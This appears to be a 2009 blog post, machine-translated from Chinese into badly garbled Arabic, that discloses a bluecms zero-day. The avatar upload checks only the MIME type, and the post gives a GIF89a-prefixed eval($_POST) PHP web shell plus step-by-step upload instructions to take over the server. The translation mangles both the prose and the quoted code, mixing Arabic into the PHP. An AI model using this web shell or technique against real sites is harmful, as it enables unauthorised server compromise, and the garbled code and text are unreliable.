bluecms 0DAY-0DAY، bluecms، 0DAY bluecms، PHP، تحميل، ملف الرأس st0p 's بلوق

bluecms 0DAY

وكان هذا الدخول في 7 أكتوبر 2009

: St0p
استنساخ يرجى الإشارة إلى المصدر: http://www.st0p.org

ملاحظة: عذرا، ودعا إلى إصدار شعر صباح اليوم في الليل مزدوج لصحيفة 0DAY، على علم، وتذهب فقط لمسؤول في النظر، وأصدرت رقعة الأمن قريبا آه .. يمكنك الذهاب على الانترنت ليس نسخة محدثة من اختبار ...

وقال تحليل للأسف، مجموعة وهناك صديق لي قدم والوظيفية، وقال لتعديل بيانات المستخدم ويمكن حقن بعض،، مع تثبيت محليا بعد، لا يمكن استخدام ونجا من علامات الاقتباس المفردة magic_quotes_gpc = إيقاف. . .

انظر تشمل خط / common.inc.php، نستسلم لليأس. .

  ......
  ! get_magic_quotes_gpc ( ) ) إذا (! get_magic_quotes_gpc ())
  {
 	 deep_addslashes ( $_POST ) ; $ _POST Deep_addslashes = ($ _POST)؛
 	 deep_addslashes ( $_GET ) ; $ _GET = Deep_addslashes ($ _GET)؛
 	 deep_addslashes ( $_COOKIES ) ; $ _COOKIES = Deep_addslashes ($ _COOKIES)؛
 	 deep_addslashes ( $_REQUEST ) ; $ _REQUEST = Deep_addslashes ($ _REQUEST)؛
  }
 ......

st0p ربما حسن الحظ، انظر تحميل الصور من أجزاء، وتحليل رمز، واستخدام ما وجدت في user.php. .

  BLUE_ROOT . 'include/upload.class.php' ) ; //调用上传类 require_once (BLUE_ROOT. 'تشمل / upload.class.php')؛ / / استدعاء الطبقة تحميل
     new upload ( ) ; $ = صورة جديدة للتحميل ()؛
	  isset ( $_FILES [ 'face_pic' ] [ 'error' ] ) && $_FILES [ 'face_pic' ] [ 'error' ] == 0 ) { إذا كان (isset ($ _files ['face_pic'] ['خطأ']) && $ _files ['face_pic'] ['خطأ'] == 0) {
		 $image -> img_upload ( $_FILES [ 'face_pic' ] , 'face_pic' ) ; $ Face_pic = $ صورة -> img_upload ($ _files ['face_pic']، 'face_pic')؛ 
                          / / لم يكشف عن لاحقة مباشرة، فإن الطبقة تكون قادرة على تمرير SHELL
	 }

فتح وتشمل / upload.class.php فقط للكشف عن رأس الملف لا يكشف عن لاحقة

 upload { private $allow_image_type = array ( 'image/jpg' , 'image/gif' , 'image/png' , 'image/pjpeg' ) ; ...... function img_upload ( $file , $dir = '' , $imgname = '' ) { if ( empty ( $dir ) ) { $dir = BLUE_ROOT . DATA . UPLOAD . date ( "Ym" ) . "/" ; } else { $dir = BLUE_ROOT . DATA . UPLOAD . $dir . "/" ; } if ( ! file_exists ( $dir ) ) { if ( ! mkdir ( $dir ) ) { showmsg ( '上传过程中创建目录失败' ) ; } } if ( empty ( $imgname ) ) { $imgname = $this -> create_tempname ( ) . $this -> get_type ( $file [ 'name' ] ) ; } $imgname = $dir . $imgname ; if ( ! in_array ( $file [ 'type' ] , $this -> allow_image_type ) ) { //只是检测了文件头部来着，那我们就直接构造一个SHELL就好了 showmsg ( '不允许的图片类型' ) ; } } ...... فئة خاصة تحميل {$ مجموعة = allow_image_type ('صورة / جي بي جي'، 'صورة / GIF'، 'صورة / PNG'، 'صورة / pjpeg')؛ ...... img_upload وظيفة ($ ملف، $ DIR =''، $ imgname ='') {إذا كان (فارغة ($ DIR)) {$ DIR = BLUE_ROOT بيانات تاريخ الرفع ("ي.") "/"؛..) والا ($ DIR = بيانات BLUE_ROOT ارفع $ دير "/"؛.} إذا كان (file_exists ($ DIR)) {إذا كان (MKDIR ($ DIR)!) {showmsg ('عملية التحميل فشل في إنشاء الدليل')؛}} إذا (فارغة ($ imgname)) {$ imgname = دولار هذا -> create_tempname () دولار هذا -> get_type (ملف $ ['اسم'])؛.} $ imgname = $ $ دير imgname، وإذا كان (in_array ($.! ملف ['نوع']، $ هذا -> allow_image_type)) {/ / فقط للكشف عن رأس الملف مع ذلك، علينا بناء قذيفة مباشرة وكأنه نوع من showmsg صورة ('غير مسموح')؛}}

حفظ أعلاه لst0p.php

A 2	GIF89a ( $_POST [ st0p ] ) ; ?> <بى EVAL ($ _POST [st0p])؛؟>

علما تسجيل الدخول إلى الحساب الشبكة، عضو -> ملفاتي، ثم تحميل صورة جديدة للانتخابات اقمنا ملف PHP، نقطة للتأكد من تعديل، عرض عنوان غير ناجح، على الصورة مباشرة على خط انقر بالزر الايمن. . SHELL كلمة تم الرفع بنجاح!

الانتهاء من تحليل، وآمل أن المزيد من التبادلات، وقضية من هذه الأشياء نريد فقط لتلبية بعض الأصدقاء معا لمناقشة والتكنولوجيا، وإعداد مجموعة كذلك، مجرد مجموعة الناس العاديين و100 فقط، وتنظيف، لم يتكلم تم تحميل بشدة ب فوضى تي، والاكتئاب، مجموعة مفتوحة هو تبادل، لا يتكلمون وكان نائبا في مكان، وتريد أن تقدم، يمكن بمعزل الطريق لا تذهب!
إذا كنت في المجموعة فقط للحصول على نتائج المناقشات الآخرين من الآخرين، لا أعرف على الدفع، أو لمجرد أن يأتي الغوص، او من دونه. . .